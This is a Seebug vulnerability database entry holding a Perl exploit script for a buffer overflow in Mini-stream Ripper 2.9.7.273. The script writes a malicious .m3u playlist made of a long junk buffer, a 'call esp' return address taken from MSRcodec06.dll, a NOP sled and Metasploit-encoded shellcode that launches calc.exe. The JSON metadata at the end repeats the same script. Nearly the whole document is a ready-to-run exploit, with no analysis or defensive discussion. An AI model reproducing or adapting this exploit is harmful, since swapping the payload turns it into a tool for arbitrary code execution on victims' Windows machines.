ID SSV:72030
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00
Description
No description provided by source.
#!/usr/bin/perl
# Exploit Title: Mini-stream Ripper 2.9.7.273 (.m3u) Universal Buffer Overflow
# Date: 28/08/2011
# Author: D3r K0n!G
# Version: 2.9.7.273
# Tested on: Windows XP SP3
# CVE : N/A
# Greets to: All my friends
# sec4ever.com & h4kz.net
my $file = "mini.m3u";
my $buff = "\x41" x 26087;
my $eip = pack ('V',0x01E4E15D); # call esp from MSRcodec06.dll
#And you can use (0x01B5273C) push esp + ret from MSRcodec00.dll
my $shellcode = "\x90" x 25;
#msfpayload windows/exec EXITFUNC=seh CMD=calc.exe R | ruby msfencode -e x86/alpha_upper -t c
$shellcode = $shellcode . "\x89\xe5\xd9\xc2\xd9\x75\xf4\x5d\x55\x59\x49\x49\x49\x49\x43".
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34".
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41".
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58".
"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b\x58\x4b\x39\x43\x30".
"\x45\x50\x43\x30\x45\x30\x4c\x49\x5a\x45\x56\x51\x49\x42\x52".
"\x44\x4c\x4b\x50\x52\x56\x50\x4c\x4b\x51\x42\x54\x4c\x4c\x4b".
"\x56\x32\x54\x54\x4c\x4b\x52\x52\x56\x48\x54\x4f\x4f\x47\x50".
"\x4a\x56\x46\x56\x51\x4b\x4f\x56\x51\x49\x50\x4e\x4c\x47\x4c".
"\x43\x51\x43\x4c\x54\x42\x56\x4c\x47\x50\x4f\x31\x58\x4f\x54".
"\x4d\x43\x31\x49\x57\x4b\x52\x4c\x30\x56\x32\x50\x57\x4c\x4b".
"\x56\x32\x52\x30\x4c\x4b\x51\x52\x47\x4c\x43\x31\x58\x50\x4c".
"\x4b\x51\x50\x43\x48\x4b\x35\x4f\x30\x54\x34\x51\x5a\x43\x31".
"\x4e\x30\x56\x30\x4c\x4b\x51\x58\x45\x48\x4c\x4b\x56\x38\x47".
"\x50\x43\x31\x49\x43\x5a\x43\x47\x4c\x47\x39\x4c\x4b\x56\x54".
"\x4c\x4b\x43\x31\x49\x46\x50\x31\x4b\x4f\x50\x31\x4f\x30\x4e".
"\x4c\x4f\x31\x58\x4f\x54\x4d\x45\x51\x58\x47\x50\x38\x4d\x30".
"\x54\x35\x4c\x34\x45\x53\x43\x4d\x4b\x48\x47\x4b\x43\x4d\x51".
"\x34\x52\x55\x4d\x32\x50\x58\x4c\x4b\x50\x58\x51\x34\x45\x51".
"\x49\x43\x52\x46\x4c\x4b\x54\x4c\x50\x4b\x4c\x4b\x56\x38\x45".
"\x4c\x43\x31\x4e\x33\x4c\x4b\x43\x34\x4c\x4b\x45\x51\x58\x50".
"\x4d\x59\x50\x44\x47\x54\x51\x34\x51\x4b\x51\x4b\x45\x31\x56".
"\x39\x50\x5a\x56\x31\x4b\x4f\x4b\x50\x51\x48\x51\x4f\x50\x5a".
"\x4c\x4b\x45\x42\x5a\x4b\x4d\x56\x51\x4d\x52\x4a\x45\x51\x4c".
"\x4d\x4b\x35\x4f\x49\x43\x30\x45\x50\x43\x30\x56\x30\x45\x38".
"\x56\x51\x4c\x4b\x52\x4f\x4c\x47\x4b\x4f\x4e\x35\x4f\x4b\x4b".
"\x4e\x54\x4e\x50\x32\x5a\x4a\x45\x38\x49\x36\x4d\x45\x4f\x4d".
"\x4d\x4d\x4b\x4f\x4e\x35\x47\x4c\x45\x56\x43\x4c\x45\x5a\x4d".
"\x50\x4b\x4b\x4b\x50\x54\x35\x54\x45\x4f\x4b\x50\x47\x54\x53".
"\x52\x52\x52\x4f\x43\x5a\x45\x50\x56\x33\x4b\x4f\x49\x45\x43".
"\x53\x45\x31\x52\x4c\x43\x53\x56\x4e\x45\x35\x54\x38\x45\x35".
"\x45\x50\x41\x41";
open($FILE, ">$file");
print $FILE $buff.$eip.$shellcode;
close($FILE);
{"href": "https://www.seebug.org/vuldb/ssvid-72030", "status": "poc", "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "Mini-stream Ripper 2.9.7.273 (.m3u) Universal BoF", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-72030", "cvelist": [], "description": "No description provided by source.", "viewCount": 2, "published": "2014-07-01T00:00:00", "sourceData": "\n #!/usr/bin/perl\r\n# Exploit Title: Mini-stream Ripper 2.9.7.273 (.m3u) Universal Buffer Overflow\r\n# Date: 28/08/2011\r\n# Author: D3r K0n!G\r\n# Version: 2.9.7.273\r\n# Tested on: Windows XP SP3\r\n# CVE : N/A\r\n# Greets to: All my friends \r\n# sec4ever.com & h4kz.net\r\nmy $file = "mini.m3u";\r\nmy $buff = "\\x41" x 26087;\r\nmy $eip = pack ('V',0x01E4E15D);\t# call esp from MSRcodec06.dll \r\n#And you can use (0x01B5273C) push esp + ret from MSRcodec00.dll\r\nmy $shellcode = "\\x90" x 25;\r\n#msfpayload windows/exec EXITFUNC=seh CMD=calc.exe R | ruby msfencode -e x86/alpha_upper -t c\r\n$shellcode = $shellcode . "\\x89\\xe5\\xd9\\xc2\\xd9\\x75\\xf4\\x5d\\x55\\x59\\x49\\x49\\x49\\x49\\x43".\r\n"\\x43\\x43\\x43\\x43\\x43\\x51\\x5a\\x56\\x54\\x58\\x33\\x30\\x56\\x58\\x34".\r\n"\\x41\\x50\\x30\\x41\\x33\\x48\\x48\\x30\\x41\\x30\\x30\\x41\\x42\\x41\\x41".\r\n"\\x42\\x54\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42\\x30\\x42\\x42\\x58".\r\n"\\x50\\x38\\x41\\x43\\x4a\\x4a\\x49\\x4b\\x4c\\x4b\\x58\\x4b\\x39\\x43\\x30".\r\n"\\x45\\x50\\x43\\x30\\x45\\x30\\x4c\\x49\\x5a\\x45\\x56\\x51\\x49\\x42\\x52".\r\n"\\x44\\x4c\\x4b\\x50\\x52\\x56\\x50\\x4c\\x4b\\x51\\x42\\x54\\x4c\\x4c\\x4b".\r\n"\\x56\\x32\\x54\\x54\\x4c\\x4b\\x52\\x52\\x56\\x48\\x54\\x4f\\x4f\\x47\\x50".\r\n"\\x4a\\x56\\x46\\x56\\x51\\x4b\\x4f\\x56\\x51\\x49\\x50\\x4e\\x4c\\x47\\x4c".\r\n"\\x43\\x51\\x43\\x4c\\x54\\x42\\x56\\x4c\\x47\\x50\\x4f\\x31\\x58\\x4f\\x54".\r\n"\\x4d\\x43\\x31\\x49\\x57\\x4b\\x52\\x4c\\x30\\x56\\x32\\x50\\x57\\x4c\\x4b".\r\n"\\x56\\x32\\x52\\x30\\x4c\\x4b\\x51\\x52\\x47\\x4c\\x43\\x31\\x58\\x50\\x4c".\r\n"\\x4b\\x51\\x50\\x43\\x48\\x4b\\x35\\x4f\\x30\\x54\\x34\\x51\\x5a\\x43\\x31".\r\n"\\x4e\\x30\\x56\\x30\\x4c\\x4b\\x51\\x58\\x45\\x48\\x4c\\x4b\\x56\\x38\\x47".\r\n"\\x50\\x43\\x31\\x49\\x43\\x5a\\x43\\x47\\x4c\\x47\\x39\\x4c\\x4b\\x56\\x54".\r\n"\\x4c\\x4b\\x43\\x31\\x49\\x46\\x50\\x31\\x4b\\x4f\\x50\\x31\\x4f\\x30\\x4e".\r\n"\\x4c\\x4f\\x31\\x58\\x4f\\x54\\x4d\\x45\\x51\\x58\\x47\\x50\\x38\\x4d\\x30".\r\n"\\x54\\x35\\x4c\\x34\\x45\\x53\\x43\\x4d\\x4b\\x48\\x47\\x4b\\x43\\x4d\\x51".\r\n"\\x34\\x52\\x55\\x4d\\x32\\x50\\x58\\x4c\\x4b\\x50\\x58\\x51\\x34\\x45\\x51".\r\n"\\x49\\x43\\x52\\x46\\x4c\\x4b\\x54\\x4c\\x50\\x4b\\x4c\\x4b\\x56\\x38\\x45".\r\n"\\x4c\\x43\\x31\\x4e\\x33\\x4c\\x4b\\x43\\x34\\x4c\\x4b\\x45\\x51\\x58\\x50".\r\n"\\x4d\\x59\\x50\\x44\\x47\\x54\\x51\\x34\\x51\\x4b\\x51\\x4b\\x45\\x31\\x56".\r\n"\\x39\\x50\\x5a\\x56\\x31\\x4b\\x4f\\x4b\\x50\\x51\\x48\\x51\\x4f\\x50\\x5a".\r\n"\\x4c\\x4b\\x45\\x42\\x5a\\x4b\\x4d\\x56\\x51\\x4d\\x52\\x4a\\x45\\x51\\x4c".\r\n"\\x4d\\x4b\\x35\\x4f\\x49\\x43\\x30\\x45\\x50\\x43\\x30\\x56\\x30\\x45\\x38".\r\n"\\x56\\x51\\x4c\\x4b\\x52\\x4f\\x4c\\x47\\x4b\\x4f\\x4e\\x35\\x4f\\x4b\\x4b".\r\n"\\x4e\\x54\\x4e\\x50\\x32\\x5a\\x4a\\x45\\x38\\x49\\x36\\x4d\\x45\\x4f\\x4d".\r\n"\\x4d\\x4d\\x4b\\x4f\\x4e\\x35\\x47\\x4c\\x45\\x56\\x43\\x4c\\x45\\x5a\\x4d".\r\n"\\x50\\x4b\\x4b\\x4b\\x50\\x54\\x35\\x54\\x45\\x4f\\x4b\\x50\\x47\\x54\\x53".\r\n"\\x52\\x52\\x52\\x4f\\x43\\x5a\\x45\\x50\\x56\\x33\\x4b\\x4f\\x49\\x45\\x43".\r\n"\\x53\\x45\\x31\\x52\\x4c\\x43\\x53\\x56\\x4e\\x45\\x35\\x54\\x38\\x45\\x35".\r\n"\\x45\\x50\\x41\\x41";\r\nopen($FILE, ">$file");\r\nprint $FILE $buff.$eip.$shellcode;\r\nclose($FILE);\r\n\n ", "id": "SSV:72030", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T14:51:37", "reporter": "Root", "enchantments": {"score": {"value": -0.1, "vector": "NONE", "modified": "2017-11-19T14:51:37", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T14:51:37", "rev": 2}, "vulnersScore": -0.1}, "references": []}
{}